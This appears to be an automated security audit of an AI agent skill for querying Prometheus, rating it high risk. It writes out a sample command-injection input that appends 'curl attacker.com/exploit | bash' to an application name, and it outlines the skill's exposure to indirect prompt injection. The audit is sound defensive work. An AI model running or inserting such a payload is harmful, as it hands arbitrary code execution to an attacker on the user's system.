prometheus-skill
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGH
Categories: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructions in SKILL.md direct the agent to run shell commands of the form 'uv run prometheus.py ...'. These commands incorporate user-provided strings (such as application names) directly into the shell command string without any validation or escaping. This creates a direct command injection vector: a malicious user could supply an input such as 'application_name"; curl attacker.com/exploit | bash; "' to execute arbitrary code.
- [PROMPT_INJECTION] (LOW): The skill is susceptible to indirect prompt injection (Category 8) because it ingests untrusted data and uses it in a functional capacity.
  1. Ingestion points: user-provided application names and project IDs in SKILL.md.
  2. Boundary markers: absent; no delimiters or 'ignore' instructions are provided.
  3. Capability inventory: execution of shell commands via 'uv run'.
  4. Sanitization: absent; the Python utility does not sanitize the query string before it is used in a URL, and the instructions do not advise the agent to sanitize inputs.
- [CREDENTIALS_UNSAFE] (SAFE): No hardcoded credentials were found. The 'prom_host' variable in 'prometheus.py' is set to a placeholder value ('your prometheus host').
Recommendations
- AI detected serious security threats
Audit Metadata